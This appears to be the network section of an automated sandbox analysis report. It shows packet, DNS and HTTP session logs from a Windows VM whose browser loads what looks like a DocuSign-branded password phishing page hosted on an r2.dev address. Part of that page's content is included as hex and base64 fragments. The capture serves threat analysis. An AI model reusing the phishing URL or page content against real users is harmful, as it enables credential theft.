                      Jan 15, 2025 01:44:09.809360981 CET49756443192.168.2.640.115.3.253
                      Jan 15, 2025 01:44:09.827037096 CET49756443192.168.2.640.115.3.253
                      Jan 15, 2025 01:44:09.827075005 CET4434975640.115.3.253192.168.2.6
                      Jan 15, 2025 01:44:14.481733084 CET44349717142.250.185.228192.168.2.6
                      Jan 15, 2025 01:44:14.481820107 CET44349717142.250.185.228192.168.2.6
                      Jan 15, 2025 01:44:14.481870890 CET49717443192.168.2.6142.250.185.228
                      Jan 15, 2025 01:44:16.385576963 CET49717443192.168.2.6142.250.185.228
                      Jan 15, 2025 01:44:16.385595083 CET44349717142.250.185.228192.168.2.6
                      Jan 15, 2025 01:44:20.956836939 CET8049725172.66.0.235192.168.2.6
                      Jan 15, 2025 01:44:20.956897974 CET4972580192.168.2.6172.66.0.235
                      Jan 15, 2025 01:44:21.009145975 CET49836443192.168.2.640.115.3.253
                      Jan 15, 2025 01:44:21.009198904 CET4434983640.115.3.253192.168.2.6
                      Jan 15, 2025 01:44:21.009254932 CET49836443192.168.2.640.115.3.253
                      Jan 15, 2025 01:44:21.009905100 CET49836443192.168.2.640.115.3.253
                      Jan 15, 2025 01:44:21.009917974 CET4434983640.115.3.253192.168.2.6
                      Jan 15, 2025 01:44:21.809318066 CET4434983640.115.3.253192.168.2.6
                      Jan 15, 2025 01:44:21.809417009 CET49836443192.168.2.640.115.3.253
                      Jan 15, 2025 01:44:21.822341919 CET49836443192.168.2.640.115.3.253
                      Jan 15, 2025 01:44:21.822380066 CET4434983640.115.3.253192.168.2.6
                      Jan 15, 2025 01:44:21.822849989 CET4434983640.115.3.253192.168.2.6
                      Jan 15, 2025 01:44:21.824887037 CET49836443192.168.2.640.115.3.253
                      Jan 15, 2025 01:44:21.824953079 CET49836443192.168.2.640.115.3.253
                      Jan 15, 2025 01:44:21.824965000 CET4434983640.115.3.253192.168.2.6
                      Jan 15, 2025 01:44:21.825089931 CET49836443192.168.2.640.115.3.253
                      Jan 15, 2025 01:44:21.871341944 CET4434983640.115.3.253192.168.2.6
                      Jan 15, 2025 01:44:21.996335983 CET4434983640.115.3.253192.168.2.6
                      Jan 15, 2025 01:44:21.996493101 CET4434983640.115.3.253192.168.2.6
                      Jan 15, 2025 01:44:21.996591091 CET49836443192.168.2.640.115.3.253
                      Jan 15, 2025 01:44:21.996668100 CET49836443192.168.2.640.115.3.253
                      Jan 15, 2025 01:44:21.996702909 CET4434983640.115.3.253192.168.2.6
                      Jan 15, 2025 01:44:22.389852047 CET4972580192.168.2.6172.66.0.235
                      Jan 15, 2025 01:44:22.394968987 CET8049725172.66.0.235192.168.2.6
                      Jan 15, 2025 01:44:39.606894016 CET49923443192.168.2.640.115.3.253
                      Jan 15, 2025 01:44:39.606940985 CET4434992340.115.3.253192.168.2.6
                      Jan 15, 2025 01:44:39.607085943 CET49923443192.168.2.640.115.3.253
                      Jan 15, 2025 01:44:39.607873917 CET49923443192.168.2.640.115.3.253
                      Jan 15, 2025 01:44:39.607892036 CET4434992340.115.3.253192.168.2.6
                      Jan 15, 2025 01:44:40.400930882 CET4434992340.115.3.253192.168.2.6
                      Jan 15, 2025 01:44:40.401118994 CET49923443192.168.2.640.115.3.253
                      Jan 15, 2025 01:44:40.403323889 CET49923443192.168.2.640.115.3.253
                      Jan 15, 2025 01:44:40.403352022 CET4434992340.115.3.253192.168.2.6
                      Jan 15, 2025 01:44:40.404274940 CET4434992340.115.3.253192.168.2.6
                      Jan 15, 2025 01:44:40.406505108 CET49923443192.168.2.640.115.3.253
                      Jan 15, 2025 01:44:40.406580925 CET49923443192.168.2.640.115.3.253
                      Jan 15, 2025 01:44:40.406593084 CET4434992340.115.3.253192.168.2.6
                      Jan 15, 2025 01:44:40.406739950 CET49923443192.168.2.640.115.3.253
                      Jan 15, 2025 01:44:40.447367907 CET4434992340.115.3.253192.168.2.6
                      Jan 15, 2025 01:44:40.578052998 CET4434992340.115.3.253192.168.2.6
                      Jan 15, 2025 01:44:40.578304052 CET4434992340.115.3.253192.168.2.6
                      Jan 15, 2025 01:44:40.578766108 CET49923443192.168.2.640.115.3.253
                      Jan 15, 2025 01:44:40.580729961 CET49923443192.168.2.640.115.3.253
                      Jan 15, 2025 01:44:40.580729961 CET49923443192.168.2.640.115.3.253
                      Jan 15, 2025 01:44:40.580794096 CET4434992340.115.3.253192.168.2.6
                      Jan 15, 2025 01:44:51.121176004 CET4972680192.168.2.6172.66.0.235
                      Jan 15, 2025 01:44:51.127964973 CET8049726172.66.0.235192.168.2.6
                      Jan 15, 2025 01:45:03.215970039 CET50005443192.168.2.640.115.3.253
                      Jan 15, 2025 01:45:03.216026068 CET4435000540.115.3.253192.168.2.6
                      Jan 15, 2025 01:45:03.216126919 CET50005443192.168.2.640.115.3.253
                      Jan 15, 2025 01:45:03.216931105 CET50005443192.168.2.640.115.3.253
                      Jan 15, 2025 01:45:03.216959000 CET4435000540.115.3.253192.168.2.6
                      Jan 15, 2025 01:45:03.973690033 CET50006443192.168.2.6142.250.185.228
                      Jan 15, 2025 01:45:03.973778009 CET44350006142.250.185.228192.168.2.6
                      Jan 15, 2025 01:45:03.973865986 CET50006443192.168.2.6142.250.185.228
                      Jan 15, 2025 01:45:03.974251986 CET50006443192.168.2.6142.250.185.228
                      Jan 15, 2025 01:45:03.974289894 CET44350006142.250.185.228192.168.2.6
                      Jan 15, 2025 01:45:04.014055967 CET4435000540.115.3.253192.168.2.6
                      Jan 15, 2025 01:45:04.014265060 CET50005443192.168.2.640.115.3.253
                      Jan 15, 2025 01:45:04.016069889 CET50005443192.168.2.640.115.3.253
                      Jan 15, 2025 01:45:04.016102076 CET4435000540.115.3.253192.168.2.6
                      Jan 15, 2025 01:45:04.016772985 CET4435000540.115.3.253192.168.2.6
                      Jan 15, 2025 01:45:04.018531084 CET50005443192.168.2.640.115.3.253
                      Jan 15, 2025 01:45:04.018573999 CET50005443192.168.2.640.115.3.253
                      Jan 15, 2025 01:45:04.018588066 CET4435000540.115.3.253192.168.2.6
                      Jan 15, 2025 01:45:04.018714905 CET50005443192.168.2.640.115.3.253
                      Jan 15, 2025 01:45:04.063323021 CET4435000540.115.3.253192.168.2.6
                      Jan 15, 2025 01:45:04.190021038 CET4435000540.115.3.253192.168.2.6
                      Jan 15, 2025 01:45:04.190505028 CET50005443192.168.2.640.115.3.253
                      Jan 15, 2025 01:45:04.190535069 CET4435000540.115.3.253192.168.2.6
                      Jan 15, 2025 01:45:04.190604925 CET50005443192.168.2.640.115.3.253
                      Jan 15, 2025 01:45:04.607574940 CET44350006142.250.185.228192.168.2.6
                      Jan 15, 2025 01:45:04.607935905 CET50006443192.168.2.6142.250.185.228
                      Jan 15, 2025 01:45:04.607980967 CET44350006142.250.185.228192.168.2.6
                      Jan 15, 2025 01:45:04.609107971 CET44350006142.250.185.228192.168.2.6
                      Jan 15, 2025 01:45:04.609541893 CET50006443192.168.2.6142.250.185.228
                      Jan 15, 2025 01:45:04.609726906 CET44350006142.250.185.228192.168.2.6
                      Jan 15, 2025 01:45:04.663433075 CET50006443192.168.2.6142.250.185.228
                      Jan 15, 2025 01:45:14.506881952 CET44350006142.250.185.228192.168.2.6
                      Jan 15, 2025 01:45:14.506958008 CET44350006142.250.185.228192.168.2.6
                      Jan 15, 2025 01:45:14.507078886 CET50006443192.168.2.6142.250.185.228
                      Jan 15, 2025 01:45:16.389724016 CET50006443192.168.2.6142.250.185.228
                      Jan 15, 2025 01:45:16.389761925 CET44350006142.250.185.228192.168.2.6
                      Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                      Jan 15, 2025 01:44:03.916759014 CET | 192.168.2.6 | 1.1.1.1 | 0x1d0c | Standard query (0) | www.google.com | A (IP address) | IN (0x0001) | false
                      Jan 15, 2025 01:44:03.916872978 CET | 192.168.2.6 | 1.1.1.1 | 0x1b35 | Standard query (0) | www.google.com | 65 | IN (0x0001) | false
                      Jan 15, 2025 01:44:05.574328899 CET | 192.168.2.6 | 1.1.1.1 | 0x4fda | Standard query (0) | pub-35a1d927529e4c9684409537cf8ff63f.r2.dev | A (IP address) | IN (0x0001) | false
                      Jan 15, 2025 01:44:05.574551105 CET | 192.168.2.6 | 1.1.1.1 | 0x1fd9 | Standard query (0) | pub-35a1d927529e4c9684409537cf8ff63f.r2.dev | 65 | IN (0x0001) | false
                      Jan 15, 2025 01:44:06.109622002 CET | 192.168.2.6 | 1.1.1.1 | 0xfe4a | Standard query (0) | pub-35a1d927529e4c9684409537cf8ff63f.r2.dev | A (IP address) | IN (0x0001) | false
                      Jan 15, 2025 01:44:06.110018969 CET | 192.168.2.6 | 1.1.1.1 | 0x63eb | Standard query (0) | pub-35a1d927529e4c9684409537cf8ff63f.r2.dev | 65 | IN (0x0001) | false
                      Jan 15, 2025 01:44:07.390014887 CET | 192.168.2.6 | 1.1.1.1 | 0xd445 | Standard query (0) | www.continentalsports.co.uk | A (IP address) | IN (0x0001) | false
                      Jan 15, 2025 01:44:07.390227079 CET | 192.168.2.6 | 1.1.1.1 | 0xa211 | Standard query (0) | www.continentalsports.co.uk | 65 | IN (0x0001) | false
                      Jan 15, 2025 01:44:08.648283005 CET | 192.168.2.6 | 1.1.1.1 | 0x8484 | Standard query (0) | www.continentalsports.co.uk | A (IP address) | IN (0x0001) | false
                      Jan 15, 2025 01:44:08.648689032 CET | 192.168.2.6 | 1.1.1.1 | 0x6c70 | Standard query (0) | www.continentalsports.co.uk | 65 | IN (0x0001) | false
                      Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                      Jan 15, 2025 01:44:03.923460007 CET | 1.1.1.1 | 192.168.2.6 | 0x1d0c | No error (0) | www.google.com | | 142.250.185.228 | A (IP address) | IN (0x0001) | false
                      Jan 15, 2025 01:44:03.923472881 CET | 1.1.1.1 | 192.168.2.6 | 0x1b35 | No error (0) | www.google.com | | | 65 | IN (0x0001) | false
                      Jan 15, 2025 01:44:05.584271908 CET | 1.1.1.1 | 192.168.2.6 | 0x4fda | No error (0) | pub-35a1d927529e4c9684409537cf8ff63f.r2.dev | | 172.66.0.235 | A (IP address) | IN (0x0001) | false
                      Jan 15, 2025 01:44:05.584271908 CET | 1.1.1.1 | 192.168.2.6 | 0x4fda | No error (0) | pub-35a1d927529e4c9684409537cf8ff63f.r2.dev | | 162.159.140.237 | A (IP address) | IN (0x0001) | false
                      Jan 15, 2025 01:44:06.118123055 CET | 1.1.1.1 | 192.168.2.6 | 0xfe4a | No error (0) | pub-35a1d927529e4c9684409537cf8ff63f.r2.dev | | 172.66.0.235 | A (IP address) | IN (0x0001) | false
                      Jan 15, 2025 01:44:06.118123055 CET | 1.1.1.1 | 192.168.2.6 | 0xfe4a | No error (0) | pub-35a1d927529e4c9684409537cf8ff63f.r2.dev | | 162.159.140.237 | A (IP address) | IN (0x0001) | false
                      Jan 15, 2025 01:44:07.609314919 CET | 1.1.1.1 | 192.168.2.6 | 0xd445 | No error (0) | www.continentalsports.co.uk | | 95.154.228.177 | A (IP address) | IN (0x0001) | false
                      Jan 15, 2025 01:44:08.656326056 CET | 1.1.1.1 | 192.168.2.6 | 0x8484 | No error (0) | www.continentalsports.co.uk | | 95.154.228.177 | A (IP address) | IN (0x0001) | false
                      • pub-35a1d927529e4c9684409537cf8ff63f.r2.dev
                      • www.continentalsports.co.uk
                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      0 | 192.168.2.6 | 49726 | 172.66.0.235 | 80 | 6468 | C:\Program Files\Google\Chrome\Application\chrome.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Jan 15, 2025 01:44:05.590259075 CET | 478 | OUT | GET /docu/e_protocol.html HTTP/1.1
                      Host: pub-35a1d927529e4c9684409537cf8ff63f.r2.dev
                      Connection: keep-alive
                      Upgrade-Insecure-Requests: 1
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Accept-Encoding: gzip, deflate
                      Accept-Language: en-US,en;q=0.9
                      Jan 15, 2025 01:44:06.106714010 CET | 534 | IN | HTTP/1.1 301 Moved Permanently
                      Date: Wed, 15 Jan 2025 00:44:06 GMT
                      Content-Type: text/html
                      Content-Length: 167
                      Connection: keep-alive
                      Cache-Control: max-age=3600
                      Expires: Wed, 15 Jan 2025 01:44:06 GMT
                      Location: https://pub-35a1d927529e4c9684409537cf8ff63f.r2.dev/docu/e_protocol.html
                      Vary: Accept-Encoding
                      Server: cloudflare
                      CF-RAY: 9021d5d98b31437b-EWR
                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>
                      Jan 15, 2025 01:44:51.121176004 CET | 6 | OUT | Data Raw: 00
                      Data Ascii:


                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                      0 | 192.168.2.6 | 49715 | 40.115.3.253 | 443
                      Timestamp | Bytes transferred | Direction | Data
                      2025-01-15 00:44:01 UTC | 71 | OUT |
                      Data Ascii: CNT 1 CON 305MS-CV: ip59yeIcMEaBqwTn.1Context: f86f44bf9bb98a20
                      2025-01-15 00:44:01 UTC | 249 | OUT |
                      Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                      2025-01-15 00:44:01 UTC | 1084 | OUT |
                      Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: ip59yeIcMEaBqwTn.2Context: f86f44bf9bb98a20<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAWLz7E3J8rYGclUaYxEo72ssgjLEbG57NFffKd2GUjGiQzXphLU2ScDUaO25ACDygN0bfdfEY62QZkrjBZXieSwLjcvP19BT9erQ+NMM8WtQav
                      2025-01-15 00:44:01 UTC | 218 | OUT |
                      Data Ascii: BND 3 CON\WNS 0 197MS-CV: ip59yeIcMEaBqwTn.3Context: f86f44bf9bb98a20<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                      2025-01-15 00:44:01 UTC | 14 | IN |
                      Data Ascii: 202 1 CON 58
                      2025-01-15 00:44:01 UTC | 58 | IN |
                      Data Ascii: MS-CV: ZZ+FN5tWr02l5WhrXmIpZg.0Payload parsing failed.


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      1 | 192.168.2.6 | 49733 | 172.66.0.235 | 443 | 6468 | C:\Program Files\Google\Chrome\Application\chrome.exe
                      Timestamp | Bytes transferred | Direction | Data
                      2025-01-15 00:44:06 UTC | 706 | OUT | GET /docu/e_protocol.html HTTP/1.1
                      Host: pub-35a1d927529e4c9684409537cf8ff63f.r2.dev
                      Connection: keep-alive
                      Upgrade-Insecure-Requests: 1
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Sec-Fetch-Site: none
                      Sec-Fetch-Mode: navigate
                      Sec-Fetch-User: ?1
                      Sec-Fetch-Dest: document
                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                      sec-ch-ua-mobile: ?0
                      sec-ch-ua-platform: "Windows"
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en;q=0.9
                      2025-01-15 00:44:06 UTC | 284 | IN | HTTP/1.1 200 OK
                      Date: Wed, 15 Jan 2025 00:44:06 GMT
                      Content-Type: text/html
                      Content-Length: 252205
                      Connection: close
                      Accept-Ranges: bytes
                      ETag: "ac9dbd4fd1fb0add29a1b8703bce9406"
                      Last-Modified: Thu, 09 Jan 2025 06:54:23 GMT
                      Server: cloudflare
                      CF-RAY: 9021d5ddac8242f8-EWR
                      2025-01-15 00:44:06 UTC | 1369 | IN |
                      Data Ascii: <!DOCTYPE html> <html lang=en class=account-server><meta charset=utf-8><meta name=viewport content="initial-scale=1.0"><title>DocuSign Login - Enter your password to sign in</title><style data-emotion=css data-single-filez-stylesheet=16>.account-serv
                      Data Ascii: Y/UE0ilnci5dcNEll11x1TXX3XLHPQ/qI6QnnuUFXnnT36F9wKd8wTe//Dn5j7U4ceHGo3oCHW8+NTwmUJGitwm5F7jk/rco4kUZzxpstOdW5Aslvt5s5bXijpaG3pcdhhHygREfNBh9uRF6CVqpKhvKny/nWSPtwnWIeWXM+vlGRjh7ym8N355FH6gYFaNitE+jF47y/CHQaNd90RjM/hg0Go1GLiJhvmLMA8IyZ/M08d80B3v5+CIrf21fBT1
                      2025-01-15 00:44:06 UTC1369INData Raw: 41 6a 48 49 63 69 68 6f 56 38 47 44 58 6a 61 51 2f 6a 4c 64 59 54 6b 65 64 34 4f 63 71 35 4d 6e 58 4a 41 57 39 4b 55 45 5a 57 6e 58 75 31 64 2b 42 44 43 54 59 33 4f 30 76 7a 59 2b 41 30 6b 41 66 4f 7a 2f 45 65 49 30 54 50 55 48 6e 58 65 6a 50 57 4b 4f 4b 6a 79 44 33 63 70 70 52 66 79 4e 77 52 56 68 6b 39 42 69 31 47 46 41 6b 44 62 78 6d 57 43 70 2f 54 37 51 38 4a 6e 76 6c 65 52 66 7a 30 55 7a 37 53 76 7a 57 44 6f 31 70 48 41 44 75 76 6a 79 66 7a 62 75 58 73 62 4f 6d 61 4e 41 51 49 4e 78 41 78 43 42 75 4f 47 45 49 62 65 79 6c 6c 74 72 59 78 41 5a 43 52 74 31 4b 32 5a 33 42 36 56 42 46 32 50 59 2f 76 55 56 77 39 63 39 63 42 58 44 2b 4c 71 51 56 6f 39 79 4b 6f 48 6f 58 72 51 71 42 37 6b 31 65 73 69 41 45 6d 43 6b 4e 79 77 46 4f 6d 75 6e 79 45 4c 52 7a 5a 49
                      Data Ascii: AjHIcihoV8GDXjaQ/jLdYTked4Ocq5MnXJAW9KUEZWnXu1d+BDCTY3O0vzY+A0kAfOz/EeI0TPUHnXejPWKOKjyD3cppRfyNwRVhk9Bi1GFAkDbxmWCp/T7Q8JnvleRfz0Uz7SvzWDo1pHADuvjyfzbuXsbOmaNAQINxAxCBuOGEIbeylltrYxAZCRt1K2Z3B6VBF2PY/vUVw9c9cBXD+LqQVo9yKoHoXrQqB7k1esiAEmCkNywFOmunyELRzZI
                      2025-01-15 00:44:06 UTC1369INData Raw: 75 37 31 67 32 43 47 7a 58 63 4a 48 61 7a 68 6c 73 46 74 77 76 75 46 4e 77 4e 33 51 76 64 6a 33 6b 51 39 7a 44 68 55 63 4c 6a 68 43 63 4a 54 34 73 38 79 33 69 65 38 53 4c 76 5a 65 52 56 31 75 75 73 4e 7a 46 76 63 39 37 6c 76 63 2f 37 6b 50 63 78 37 31 4f 78 7a 38 57 2b 4a 48 77 74 38 61 33 45 39 78 49 2f 53 76 30 73 39 61 76 55 37 7a 4a 2f 79 76 77 74 38 36 2f 67 2f 36 4d 51 71 63 47 43 38 4a 57 4e 51 4a 34 6a 30 4d 67 64 4b 50 4d 57 2f 45 6a 68 4b 6b 58 4b 67 30 4a 47 35 71 71 41 31 47 67 75 54 49 73 37 4c 4f 5a 6f 58 47 39 43 4c 31 4c 4e 36 49 48 55 48 4f 54 31 74 4b 69 4d 69 6a 56 79 43 72 2b 56 36 61 62 36 62 48 73 34 71 67 7a 69 38 48 50 76 70 2b 79 70 32 5a 64 49 77 78 32 75 6f 36 2b 4c 4f 4f 6f 4a 33 46 37 71 30 6d 35 6c 6b 57 35 69 6a 37 4e 33 31
                      Data Ascii: u71g2CGzXcJHazhlsFtwvuFNwN3Qvdj3kQ9zDhUcLjhCcJT4s8y3ie8SLvZeRV1uusNzFvc97lvc/7kPcx71Oxz8W+JHwt8a3E9xI/Sv0s9avU7zJ/yvwt86/g/6MQqcGC8JWNQJ4j0MgdKPMW/EjhKkXKg0JG5qqA1GguTIs7LOZoXG9CL1LN6IHUHOT1tKiMijVyCr+V6ab6bHs4qgzi8HPvp+yp2ZdIwx2uo6+LOOoJ3F7q0m5lkW5ij7N31
                      2025-01-15 00:44:06 UTC1369INData Raw: 4c 6b 4c 42 41 6f 54 6c 46 76 42 61 58 70 4a 6a 54 74 46 4a 32 54 6a 4e 4c 79 51 75 45 45 45 49 49 49 52 51 53 42 77 6a 4e 61 62 70 70 63 30 33 4e 4d 67 51 42 42 4d 58 52 59 70 70 68 47 49 71 6a 4f 49 71 6a 75 37 67 47 2f 66 78 66 42 35 74 78 2b 79 69 32 37 63 64 4f 4c 6e 2f 38 49 79 41 48 75 51 62 49 4c 55 4c 75 53 5a 72 6c 43 41 78 43 63 41 68 43 77 38 49 6a 49 68 45 56 6a 5a 68 59 78 4d 55 6a 49 52 46 4a 79 53 6d 70 61 55 6a 50 79 4d 7a 4b 6a 68 77 35 6b 58 65 43 50 47 41 65 78 79 64 2f 34 46 4d 30 47 46 49 7a 57 4e 45 78 43 4d 45 77 42 79 4a 4d 68 6e 41 36 4a 50 4e 44 48 69 41 68 4e 66 51 77 77 77 51 37 37 4f 46 6d 34 2f 68 77 6c 73 50 68 4a 76 62 77 46 44 46 38 4a 42 61 6d 38 47 43 41 47 59 5a 35 67 67 69 66 49 64 35 76 49 63 57 78 53 2f 65 2b 51 62
                      Data Ascii: LkLBAoTlFvBaXpJjTtFJ2TjNLyQuEEEIIIRQSBwjNabppc03NMgQBBMXRYpphGIqjOIqju7gG/fxfB5tx+yi27cdOLn/8IyAHuQbILULuSZrlCAxCcAhCw8IjIhEVjZhYxMUjIRFJySmpaUjPyMzKjhw5kXeCPGAexyd/4FM0GFIzWNExCMEwByJMhnA6JPNDHiAhNfQwwwQ77OFm4/hwlsPhJvbwFDF8JBam8GCAGYZ5ggifId5vIcWxS/e+Qb
                      2025-01-15 00:44:06 UTC1369INData Raw: 78 6d 51 39 36 31 66 6b 6e 35 59 4b 46 34 68 38 46 48 78 79 31 76 4f 68 31 6a 4d 62 45 57 77 30 55 71 33 2f 30 37 41 4c 72 4e 75 38 62 75 48 57 75 68 33 50 46 75 64 35 31 6f 69 62 62 79 63 59 6a 6a 48 34 54 42 6c 49 4e 72 52 79 7a 4a 56 56 48 65 6b 32 32 72 4f 46 5a 76 66 35 62 59 77 66 68 32 53 6c 74 57 68 69 55 4d 51 6c 74 32 33 4a 65 69 56 74 5a 30 6c 35 30 39 46 69 37 59 6f 33 4b 39 35 62 45 53 4e 35 6c 71 42 35 31 73 75 72 72 6d 50 49 75 41 34 63 46 2b 53 77 71 45 50 39 2f 4c 6a 36 73 2b 47 54 6a 75 54 4f 63 74 49 50 4e 37 6f 73 54 43 4c 46 71 72 73 72 33 2b 6a 68 63 73 65 64 44 6c 77 51 45 4e 73 6b 4c 6f 6a 4d 4a 30 65 4d 52 69 56 77 44 6e 71 37 4d 37 54 64 37 6c 37 76 33 74 37 33 6f 66 4f 31 50 38 42 4c 43 41 71 54 59 2b 64 58 66 39 61 6a 63 6a 6f
                      Data Ascii: xmQ961fkn5YKF4h8FHxy1vOh1jMbEWw0Uq3/07ALrNu8buHWuh3PFud51oibbycYjjH4TBlINrRyzJVVHek22rOFZvf5bYwfh2SltWhiUMQlt23JeiVtZ0l509Fi7Yo3K95bESN5lqB51surrmPIuA4cF+SwqEP9/Lj6s+GTjuTOctIPN7osTCLFqrsr3+jhcsedDlwQENskLojMJ0eMRiVwDnq7M7Td7l7v3t73ofO1P8BLCAqTY+dXf9ajcjo


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      2 | 192.168.2.6 | 49745 | 95.154.228.177 | 443 | 6468 | C:\Program Files\Google\Chrome\Application\chrome.exe
                      Timestamp | Bytes transferred | Direction | Data
                      2025-01-15 00:44:08 UTC | 635 | OUT | GET /media/catalog/product/cache/7fd38fa62b8fefd3d046b3795a3b5e36/b/l/blurred_invoice.jpg HTTP/1.1
                      Host: www.continentalsports.co.uk
                      Connection: keep-alive
                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                      sec-ch-ua-mobile: ?0
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                      sec-ch-ua-platform: "Windows"
                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                      Sec-Fetch-Site: cross-site
                      Sec-Fetch-Mode: no-cors
                      Sec-Fetch-Dest: image
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en;q=0.9
                      2025-01-15 00:44:08 UTC | 370 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.10.3 (Ubuntu)
                      Date: Wed, 15 Jan 2025 00:44:08 GMT
                      Content-Type: image/jpeg
                      Content-Length: 7494
                      Last-Modified: Tue, 26 Jul 2022 21:55:08 GMT
                      Connection: close
                      ETag: "62e062bc-1d46"
                      Expires: Thu, 15 Jan 2026 00:44:08 GMT
                      Cache-Control: max-age=31536000
                      Cache-Control: public
                      X-Frame-Options: SAMEORIGIN
                      Accept-Ranges: bytes


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      3 | 192.168.2.6 | 49755 | 95.154.228.177 | 443 | 6468 | C:\Program Files\Google\Chrome\Application\chrome.exe
                      Timestamp | Bytes transferred | Direction | Data
                      2025-01-15 00:44:09 UTC | 435 | OUT | GET /media/catalog/product/cache/7fd38fa62b8fefd3d046b3795a3b5e36/b/l/blurred_invoice.jpg HTTP/1.1
                      Host: www.continentalsports.co.uk
                      Connection: keep-alive
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                      Accept: */*
                      Sec-Fetch-Site: none
                      Sec-Fetch-Mode: cors
                      Sec-Fetch-Dest: empty
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en;q=0.9
                      2025-01-15 00:44:09 UTC | 370 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.10.3 (Ubuntu)
                      Date: Wed, 15 Jan 2025 00:44:09 GMT
                      Content-Type: image/jpeg
                      Content-Length: 7494
                      Last-Modified: Tue, 26 Jul 2022 21:55:08 GMT
                      Connection: close
                      ETag: "62e062bc-1d46"
                      Expires: Thu, 15 Jan 2026 00:44:09 GMT
                      Cache-Control: max-age=31536000
                      Cache-Control: public
                      X-Frame-Options: SAMEORIGIN
                      Accept-Ranges: bytes


                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                      4 | 192.168.2.6 | 49756 | 40.115.3.253 | 443
                      Timestamp | Bytes transferred | Direction | Data
                      2025-01-15 00:44:09 UTC | 71 | OUT | Data Ascii: CNT 1 CON 305MS-CV: 8VpmpSirpEiE5bct.1Context: 6516de5cf0f49667
                      2025-01-15 00:44:09 UTC | 249 | OUT | Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                      2025-01-15 00:44:09 UTC | 1084 | OUT | Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: 8VpmpSirpEiE5bct.2Context: 6516de5cf0f49667<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAWLz7E3J8rYGclUaYxEo72ssgjLEbG57NFffKd2GUjGiQzXphLU2ScDUaO25ACDygN0bfdfEY62QZkrjBZXieSwLjcvP19BT9erQ+NMM8WtQav
                      2025-01-15 00:44:09 UTC | 218 | OUT | Data Ascii: BND 3 CON\WNS 0 197MS-CV: 8VpmpSirpEiE5bct.3Context: 6516de5cf0f49667<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                      2025-01-15 00:44:09 UTC | 14 | IN | Data Ascii: 202 1 CON 58
                      2025-01-15 00:44:09 UTC | 58 | IN | Data Ascii: MS-CV: jPqoRGQc30uWtGWfekO/Vw.0Payload parsing failed.


                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                      5 | 192.168.2.6 | 49836 | 40.115.3.253 | 443
                      Timestamp | Bytes transferred | Direction | Data
                      2025-01-15 00:44:21 UTC | 71 | OUT | Data Ascii: CNT 1 CON 305MS-CV: T0RBwX6SG0yZJgUh.1Context: 29c3509846f3fdd9
                      2025-01-15 00:44:21 UTC | 249 | OUT | Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
